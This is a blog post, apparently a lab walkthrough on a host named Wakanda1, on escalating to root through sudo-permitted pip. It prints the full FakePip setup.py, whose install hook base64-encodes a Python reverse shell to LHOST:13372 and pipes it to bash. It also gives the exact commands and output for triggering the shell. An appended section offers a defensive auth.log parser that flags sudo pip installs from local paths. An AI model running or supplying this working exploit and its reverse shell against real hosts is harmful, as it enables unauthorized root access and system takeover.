pip privilege escalation

After obtaining a low-privilege shell, check whether pip can be run through sudo. There are generally two cases:

1. You know the password of the current low-privilege user, so you can run pip directly through sudo.

2. You do not know the current user's password, but sudo is configured to let the current user run pip without entering a password.

Step 1: Download the fakepip attack script. The script comes from https://github.com/0x00-0x00/FakePip and reads as follows:

```python
from setuptools import setup
from setuptools.command.install import install
import base64
import os


# Custom install command: setuptools calls run() while "pip install" is
# processing the package, so this code executes with pip's privileges
# (root when pip is run through sudo).
class CustomInstall(install):
  def run(self):
    install.run(self)
    LHOST = 'localhost'  # change this
    LPORT = 13372

    # Written for Python 2: base64.b64encode() is given a str here
    reverse_shell = 'python -c "import os; import pty; import socket; s = socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect((\'{LHOST}\', {LPORT})); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); os.putenv(\'HISTFILE\', \'/dev/null\'); pty.spawn(\'/bin/bash\'); s.close();"'.format(LHOST=LHOST,LPORT=LPORT)
    encoded = base64.b64encode(reverse_shell)
    os.system('echo %s|base64 -d|bash' % encoded)


setup(name='FakePip',
      version='0.0.1',
      description='This will exploit a sudoer able to /usr/bin/pip install *',
      url='https://github.com/0x00-0x00/fakepip',
      author='zc00l',
      author_email='andre.marques@esecurity.com.br',
      license='MIT',
      zip_safe=False,
      cmdclass={'install': CustomInstall})  # hook the install step
```

Step 2: Open a second shell on the same host, so that you hold two shells on the target, and in shell 2 listen on local port 13372.

Step 3: In shell 1, invoke the fakepip attack script:

```
devops@Wakanda1:/$ cd /tmp
devops@Wakanda1:/$ mkdir fakepip && cd fakepip
(create the attack script above in this directory and save it as setup.py)
devops@Wakanda1:/tmp/fakepip$ sudo pip install . --upgrade --force-reinstall
Unpacking /tmp/fakepip
  Running setup.py (path:/tmp/pip-AdN12x-build/setup.py) egg_info for package from file:///tmp/fakepip

Installing collected packages: FakePip
  Found existing installation: FakePip 0.0.1
    Uninstalling FakePip:
      Successfully uninstalled FakePip
  Running setup.py install for FakePip

^C  Rolling back uninstall of FakePip
Cleaning up...
```

Step 4: Go back to shell 2; a root shell has now been returned there.
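The detection-side counterpart of the steps above, added here as an example and not part of the original post or the FakePip project: every sudo invocation is written to auth.log with the caller, PWD and COMMAND, so a `sudo pip install` whose target is a local path (`.`, `./dir`, `/abs/path`) rather than an index package can be flagged and the setup.py location resolved against the logged PWD. The log lines, the `wakanda1` host name and the trusted-prefix list are constructed assumptions.

```python
import os
import re

# Constructed sample lines in the syslog format sudo writes to auth.log
# (assumed values, not captured from the host in the post).
SAMPLE_AUTH_LOG = """\
Jan  9 17:50:01 wakanda1 sudo:   devops : TTY=pts/1 ; PWD=/tmp/fakepip ; USER=root ; COMMAND=/usr/bin/pip install . --upgrade --force-reinstall
Jan  9 17:51:13 wakanda1 sudo:   devops : TTY=pts/1 ; PWD=/home/devops ; USER=root ; COMMAND=/usr/bin/pip install requests
Jan  9 17:52:40 wakanda1 sudo:   admin : TTY=pts/0 ; PWD=/opt/build ; USER=root ; COMMAND=/usr/bin/pip install ./pkg-1.0.tar.gz
Jan  9 17:53:02 wakanda1 sudo:   admin : TTY=pts/0 ; PWD=/home/admin ; USER=root ; COMMAND=/usr/bin/apt-get update
"""

SUDO_RE = re.compile(
    r"sudo:\s+(?P<user>\S+)\s+:.*?PWD=(?P<pwd>\S+)\s+;.*?COMMAND=(?P<cmd>.*)$")

# Directories only root can write to (assumed policy); a setup.py anywhere
# else could have been planted by an unprivileged user.
TRUSTED_PREFIXES = ("/usr/", "/opt/")


def local_install_targets(argv):
    """Arguments of 'pip install' that name a filesystem path (., ./dir,
    ../dir, /abs/path) rather than an index package; option flags are skipped."""
    if "install" not in argv:
        return []
    args = argv[argv.index("install") + 1:]
    return [a for a in args if not a.startswith("-")
            and (a in (".", "..") or a.startswith(("./", "../", "/")))]


def flag_sudo_pip_installs(log_text):
    """One record per sudo pip install that ran a local setup.py as root,
    with the path resolved against the PWD sudo logged."""
    hits = []
    for line in log_text.splitlines():
        m = SUDO_RE.search(line)
        if not m:
            continue
        argv = m.group("cmd").split()
        # matches pip, pip2, pip3, pip3.6 ...; other sudo commands are ignored
        if not argv or not os.path.basename(argv[0]).startswith("pip"):
            continue
        for target in local_install_targets(argv):
            resolved = os.path.normpath(os.path.join(m.group("pwd"), target))
            hits.append({"user": m.group("user"), "path": resolved,
                         "untrusted": not resolved.startswith(TRUSTED_PREFIXES),
                         "command": m.group("cmd")})
    return hits
```

Running it over the sample yields two records: the `/tmp/fakepip` install by devops is marked untrusted, the `/opt/build` tarball is not, and the `requests` install from the index is not flagged at all.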

posted @ 2019-01-09 17:57 by 隐念笎